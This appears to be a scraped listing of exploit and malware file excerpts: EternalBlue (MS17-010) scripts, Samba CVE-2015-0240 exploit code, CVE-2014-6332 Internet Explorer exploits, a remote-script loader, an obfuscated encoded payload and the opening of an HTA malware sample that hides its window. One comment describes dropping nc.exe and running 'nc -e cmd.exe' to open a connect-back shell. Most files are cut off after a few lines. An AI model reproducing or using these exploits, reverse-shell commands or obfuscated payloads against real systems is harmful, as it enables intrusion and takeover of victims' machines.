hackernix10

# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack

if len(sys.argv) < 4:
	print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
	sys.exit()

sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()

hackernix10

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

hackernix10

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

hackernix10

#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya

The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by 
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.

Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

hackernix10

#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug

Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

#################
Exploitability against CentOS/Ubuntu binaries

hackernix10

<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

hackernix10

<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit

References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

hackernix10

<script type="text/javascript">
function Carregar(url, callback)
{
    var head = document.getElementsByTagName('head')[0];
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = url;

    script.onreadystatechange = callback;
    script.onload = callback;

hackernix10

var a="'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'02v{rg'1F'00vgzv-hctcqapkrv'00'1Gtcp'02n2n'1F'05IiQIraAdleAfrzEax7{HqnGdiDUXmL2O:@F`FHFdHHWL:DF`uKFdHzEPxu1ZqL2O:DF`@LFdwn0`szJfqTZ[oTEXALFdqn2S{u1LqH2O:T0ajLoS1u1OGDZLj;WO3HhLs@hO:zUQFLFduChO:@F`@LFd27UXvfUXx;DahjEXdPEXjzJ`HjhO:@F`AfFd6u0SxuZcqP2O:Pl`n3Ufh;EXAfFdqDofnH2L:LF`uKFd2uEM{ulLqLiO:j0[2n0fxH2L:HZ[0DGO:DxZ:fxSxuJfxTUfzToWuPJfKzWV[@hO:7igrH2O:HF`uKFdq;DM{uZOqjhO:PF`ALFdP7GWMnZUmjFcVXF`u@lS1uZW0jFT2fVgmjhO:TEajL0an7Uf6KFd0uoSxuZW0jFT2fVgmP2O:@F`ALFd1uEM{uZLqH2L:nEU1[DL2XEV{OWT[nx[iHEO{uZcq@hO:nF`6KFd7u0S{uZQqLiO:zUcFHFdHLiO:fF`uKFdnLJ`nP2L:LZc4P2O:fFO{uJMxnogALFd3uEM{uZcqLiO:nG`ALFdqf0`3DlS1ulatHlan70`:f1`i7Uc1H2O:TUf{PJO{uZg3n0L{ulPRrlSxuZMqH2L:DxZGLFd6u0S{uJ`tL0`2;oauzlPRrZO{uJa2PJc:HZX{HZXoToa:X0LrH2O:TE`rXoO{uJMuKFdoToa:LoaxPZXlzlOqDhO:TE`rj0fALFdz:3S{uJL3GhO0GFPxuJMxnogGLFdMrZczKFdn@Z[hLJfn70L{u1`rHZ[i7UfhT0Wx7EPx@hO:;Uc{DU`rHJWx7EPx@hO:nEajnlanTZaszZgjzEaxnEX{KFdn70`wD2O:L1f6KFdn@Z[hLZXwTJdOHTT:;Uchno`HnFO:HVMzChO:nEM{ulOEHWOpHx[3nDa6SZO{C1SxuZcrHWL:

hackernix10

## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try